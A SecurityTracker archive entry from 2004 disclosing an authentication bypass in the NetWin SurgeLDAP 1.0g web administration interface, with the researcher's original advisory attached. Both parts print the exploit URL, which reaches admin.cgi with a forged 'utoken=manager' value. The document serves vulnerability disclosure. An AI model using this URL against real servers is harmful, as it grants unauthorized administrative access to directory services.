SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Directory)  >   SurgeLDAP Vendors:   NetWin
SurgeLDAP Web Administration Interface Authentication Flaw Lets Remote Users Gain Access
SecurityTracker Alert ID:  1010068
SecurityTracker URL:  http://securitytracker.com/id/1010068
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 5 2004
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.0g (Build 12)
Description:   Ziv Kamir of Global Security Solution IT reported an authentication vulnerability in SurgeLDAP. A remote user can gain access to the web-based administration interface.

It is reported that a remote user can bypass the authentication process on the web administration interface with the following type of URL:

http://127.0.0.1:6680/admin.cgi?cmd=show&page=main.tpl&utoken=manager

The vendor was reportedly notified on March 28, 2004.

Impact:   A remote user can bypass the authentication process and gain access to the web administration interface.
Solution:   No solution was available at the time of this entry.
Vendor URL:  netwinsite.com/surgeldap/ (Links to External Site)
Cause:   Authentication error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 11 2004 (Vendor Issues Fix) SurgeLDAP Web Administration Interface Authentication Flaw Lets Remote Users Gain Access
The vendor has issued a fix.



 Source Message Contents

Subject:  Vulnerability Under SurgeLdap


This is a multi-part message in MIME format.
--------------020300050908030201070604
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit




------------------------------------------------------------------------
Do you Yahoo!?
Win a $20,000 Career Makeover at Yahoo! HotJobs
<http://pa.yahoo.com/*http://us.rd.yahoo.com/hotjobs/hotjobs_mail_signature_footer_textlink/evt=23983/*http://hotjobs.sweepstakes.yahoo.com/careermakeover>
 



--------------020300050908030201070604
Content-Type: text/plain;
 name="Surge.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="Surge.txt"

05/05/04


====================================
 GSSIT - Global Security Solution IT
====================================		

-------------------------------------------------------

Application:    SurgeLdap Server 
Web Site   :    http://netwinsite.com/surgeldap/surgeldap.htm
Versions   :    v1.0g (Build 12)
Platform   :    Windows 
Bug        :    Bypass the Admin Web Interface authentication

             
                           
Credits:
########

#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     Email : gss_it@yahoo.com          #
#                                       #
#                                       #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

SurgeLDAP is the fastest, full-featured ldap server on the market today.

SurgeLDAP is an advanced easy to manage and install high performance LDAP v3 server. It supports any number of schemas, easy to add/modify
 existing schemas, integrated web based user access, and fast browser based administration tools. And all relevant RFC protocols LDAP
 v2, LDAP v3, HTTP.



=======
2) Bug
=======

Bypass the Admin Web Interface authentication


===========
3) The Code
===========


http://127.0.0.1:6680/admin.cgi?cmd=show&page=main.tpl&utoken=manager


======
4) Fix
======

Date of Vendor Notification:
----------------------------

28 Mar 2004 



==============================================================================================

                 *** The Data is for educational purpose only. *** 

          The information in this bulletin is provided "AS IS" without 
          warranty of any kind. In no event shall we be liable for any 
          damages whatsoever including direct, indirect, incidental, 
          consequential, loss of business profits or special damages. 

==============================================================================================

--------------020300050908030201070604--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC